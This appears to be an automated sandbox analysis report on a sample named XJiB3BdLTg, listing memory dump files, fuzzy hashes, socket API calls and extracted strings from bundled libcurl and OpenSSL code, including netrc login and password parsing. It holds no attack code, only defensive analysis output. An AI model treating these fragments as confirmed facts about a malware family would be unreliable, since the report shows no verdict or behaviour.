                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: recvfrom
                                          • String ID:
                                          • API String ID: 846543921-0
                                          • Opcode ID: d6f0a957b995cc032b0954240493efd447f82c427c9846b38881ab10b6d7b514
                                          • Instruction ID: e37b901e79f657d2f39d639e97f77dbaa12cf441aaddc80579edff59576007db
                                          • Opcode Fuzzy Hash: d6f0a957b995cc032b0954240493efd447f82c427c9846b38881ab10b6d7b514
                                          • Instruction Fuzzy Hash: A7F06D79119308AFE220AE01DC44D6BBBEDEFC9754F05456DFD48232119670AE10CBB2
                                          APIs
                                          • socket.WS2_32(?,0028B280,00000000,-00000001,00000000,0028B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0028AF66
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: socket
                                          • String ID:
                                          • API String ID: 98920635-0
                                          • Opcode ID: c27cf68987b76261d5aec51cc2480b201c90e68a4dec272736bd485bc401a67d
                                          • Instruction ID: 16c991ab2b667b24f817245c8bdf594e383e82a63dea567ec344d5e49e792378
                                          • Opcode Fuzzy Hash: c27cf68987b76261d5aec51cc2480b201c90e68a4dec272736bd485bc401a67d
                                          • Instruction Fuzzy Hash: 4EE06DB6A053216BD624DE1CE8449ABF3A9EFC4B20F044A4EFD5463204C730AC5087E2
                                          APIs
                                          • closesocket.WS2_32(?,00289422,?,?,?,?,?,?,?,?,?,?,?,w3',0069C880,00000000), ref: 0028B04D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: closesocket
                                          • String ID:
                                          • API String ID: 2781271927-0
                                          • Opcode ID: 539793663d100293ba9dafb71f089db94fa14fbbd145528d80b5df1ef8c4289c
                                          • Instruction ID: 871ac71bf0d6faadadbad7bb590a74f246cd80e2a993dd9ed49ca2db90c1cab6
                                          • Opcode Fuzzy Hash: 539793663d100293ba9dafb71f089db94fa14fbbd145528d80b5df1ef8c4289c
                                          • Instruction Fuzzy Hash: B4D0C2383002025BCA20EE14C884A5B732B7FC0714FACCB6CE02C8A190C73BDC538701
                                          APIs
                                          • ioctlsocket.WS2_32(?,8004667E,?,?,001FAF56,?,00000001), ref: 002267FB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: ioctlsocket
                                          • String ID:
                                          • API String ID: 3577187118-0
                                          • Opcode ID: d8fa34f3693b86296a7221c83b3a874f7223603639ff2174fd2e30c6c673c929
                                          • Instruction ID: bac9bb081ddea2c91e230323d3ed7998803d9b97f757228beda737514c1ad8b1
                                          • Opcode Fuzzy Hash: d8fa34f3693b86296a7221c83b3a874f7223603639ff2174fd2e30c6c673c929
                                          • Instruction Fuzzy Hash: E2C012F1109300AFC60C4724D855B2EB7D8DB44255F01491CB04692180EA349450CA1A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                          • API String ID: 0-1371176463
                                          • Opcode ID: a15e825cee2f2815048d15c3d2a2c5599ea43efa8b443d34ff42ef5a4cd464ff
                                          • Instruction ID: 4df37c66111ed119a7a535b2422ba373385c7d9f049862468a2b1826a2ea2649
                                          • Opcode Fuzzy Hash: a15e825cee2f2815048d15c3d2a2c5599ea43efa8b443d34ff42ef5a4cd464ff
                                          • Instruction Fuzzy Hash: 47B24B70A18342EBD7209E24DC4AB66BBD5AF54704F08453EF889972D3EBB5DC28C752
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: localeconv
                                          • String ID: $d$nil)
                                          • API String ID: 3737801528-394766432
                                          • Opcode ID: 0f434fb03a7ae5e07fc318eb2c757738d4bf99afa080c828452d7a02073e8e68
                                          • Instruction ID: 336f62634ff496b42b9216ba7a38046f702cad154a2c054c3c9943651c1f1248
                                          • Opcode Fuzzy Hash: 0f434fb03a7ae5e07fc318eb2c757738d4bf99afa080c828452d7a02073e8e68
                                          • Instruction Fuzzy Hash: F7136B706087418FD720DF28C0956AABFE1BFC9358F24492DE9959B3A1D771EC49CB82
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$`J{$`J{$bJ{$bJ{$bJ{$file$file://%s%s%s$https$urlapi.c$vJ{$vJ{$xn--
                                          • API String ID: 0-741775103
                                          • Opcode ID: ca77884964b1bd0aa9e99605879e5328c88bb78ce6559f361b93fd385f6c190e
                                          • Instruction ID: a9c6b9d0021f2bd33998cecae05601df3f9f0a1a289bcd0b360021b7111f8718
                                          • Opcode Fuzzy Hash: ca77884964b1bd0aa9e99605879e5328c88bb78ce6559f361b93fd385f6c190e
                                          • Instruction Fuzzy Hash: 9B724B30608F819FE7258A1AC9467ABB7D3AF91348F05862CEDC55B293E776DC84C781
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                          • API String ID: 0-122532811
                                          • Opcode ID: cae3e90d83cba98811c2b37c625861f028138c1c80f6ac3d55577f1789f490d6
                                          • Instruction ID: 24d86d8dd64df3b8d5da0b2d1e08f6ce4e4f3e85e2a1fafe7573412f52c96027
                                          • Opcode Fuzzy Hash: cae3e90d83cba98811c2b37c625861f028138c1c80f6ac3d55577f1789f490d6
                                          • Instruction Fuzzy Hash: A042F6B1B08700AFD708DE28CC41BABB6E6EBD4704F048A2DF55D97391E775AD148B92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ans$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                          • API String ID: 0-359024792
                                          • Opcode ID: 4fcadf09eee452307b9fd53327bdd7de08f1de3dc5fe55d8375b6a9434ed7507
                                          • Instruction ID: 0474afac839a0a16ab960e5fae2eaa6b036beca57df20e49fbf3ad270489c008
                                          • Opcode Fuzzy Hash: 4fcadf09eee452307b9fd53327bdd7de08f1de3dc5fe55d8375b6a9434ed7507
                                          • Instruction Fuzzy Hash: 9F61F8A5A2830167EB14AA20AC46B3B7699AB95308F04C43DFC4E96392FA71DD64C753
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: !$EVP_DecryptFinal_ex$EVP_DecryptUpdate$EVP_EncryptFinal_ex$assertion failed: b <= sizeof(ctx->buf)$assertion failed: b <= sizeof(ctx->final)$crypto/evp/evp_enc.c
                                          • API String ID: 0-2550110336
                                          • Opcode ID: 03d5cca51c6f0e5f208b2b91064ba0dc2d0c397c7239ffed145e396b1d47f019
                                          • Instruction ID: deba961b745ae81aee929f887905316fa8d6409182f166e135429a588732b35e
                                          • Opcode Fuzzy Hash: 03d5cca51c6f0e5f208b2b91064ba0dc2d0c397c7239ffed145e396b1d47f019
                                          • Instruction Fuzzy Hash: 9D327D70748304BBD7367A209C42F3A7799FF50704F148998F9999A2C2EBB8E995C742
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $.$;$?$?$xn--$xn--
                                          • API String ID: 0-543057197
                                          • Opcode ID: ca5798f7d0a68b9ed2c91e52eb97a55e9ab7bd47f91a00544008c0cf5547cbb0
                                          • Instruction ID: 9a74ba70f796f746ecb0bec52485d514f8d93020f87392736497e9757f5c6d2e
                                          • Opcode Fuzzy Hash: ca5798f7d0a68b9ed2c91e52eb97a55e9ab7bd47f91a00544008c0cf5547cbb0
                                          • Instruction Fuzzy Hash: 2122377AA263069FEB50AE24DD81B6B77E4AF94308F04453CF859932D2F770D924CB52
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: FreeTable
                                          • String ID: 127.0.0.1$::1$TRSKE
                                          • API String ID: 3582546490-434011787
                                          • Opcode ID: bfb9f78ba871207c5564ac40e4dc53719b93ee37c2a46ff331fa9b29f1a0ab6a
                                          • Instruction ID: eaae05f178553ac16ecf7706ad3702918771aa522690582362b08fdf5421568a
                                          • Opcode Fuzzy Hash: bfb9f78ba871207c5564ac40e4dc53719b93ee37c2a46ff331fa9b29f1a0ab6a
                                          • Instruction Fuzzy Hash: B2A1B3B5D243429BE310EF24C845736B7E0BF95304F198629F8498B291F7B1E9E0D792
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                          • API String ID: 0-2555271450
                                          • Opcode ID: b11368bffe64c5ceff9e9ccbb1756849ec0e5d15b8b37a585393bcee835f6363
                                          • Instruction ID: dafc3e7c0974021b8a48bf4e067e61cb685ef0162fb7398d1243e877f9f429b3
                                          • Opcode Fuzzy Hash: b11368bffe64c5ceff9e9ccbb1756849ec0e5d15b8b37a585393bcee835f6363
                                          • Instruction Fuzzy Hash: 66C27B716083458FC718CF28C4D1B6AB7E2AFE9314F158A2DE89ADB351D734ED458B82
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                          • API String ID: 0-2555271450
                                          • Opcode ID: e7a9a6da660a4dae85150046a2aad6a3235108d187630a0df7fd35f165e9d5ee
                                          • Instruction ID: 792b71fbe14db28467084c8b504d1ba91b31e37944efe55950f1dfa9afe035be
                                          • Opcode Fuzzy Hash: e7a9a6da660a4dae85150046a2aad6a3235108d187630a0df7fd35f165e9d5ee
                                          • Instruction Fuzzy Hash: 7382A371A083419FD714CE18C885B6BBBE2EFE5724F198A2DF89997291D730DC06CB52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: default$login$macdef$machine$netrc.c$password
                                          • API String ID: 0-1043775505
                                          • Opcode ID: 271aba02c8d30738be8536a060ebd5b39c717bd0ad32e679810baa232d41ca84
                                          • Instruction ID: d384fbe142af219d39c9038786f50ace6b4e7de32bda8d9f2f65fb24c2804c86
                                          • Opcode Fuzzy Hash: 271aba02c8d30738be8536a060ebd5b39c717bd0ad32e679810baa232d41ca84
                                          • Instruction Fuzzy Hash: 95E15E725283A2BBD3209F94B84976BBBD4AF55708F14042CF8C557281E3F9DD68C792
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                          • API String ID: 0-4201740241
                                          • Opcode ID: ae40ff67ecc38c2f00aa4110fce7855179716ea0b88cd6692943faf42677d51d
                                          • Instruction ID: e48119c34fff3fffb9d824e7bde8f6f12c1a237d49b3342bae94d9ff5f7069cd
                                          • Opcode Fuzzy Hash: ae40ff67ecc38c2f00aa4110fce7855179716ea0b88cd6692943faf42677d51d
                                          • Instruction Fuzzy Hash: 7162D3B0914742EBD715CF60C4907AAB7E4FF98304F04961DE88D8B352E774EAA4CB96
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
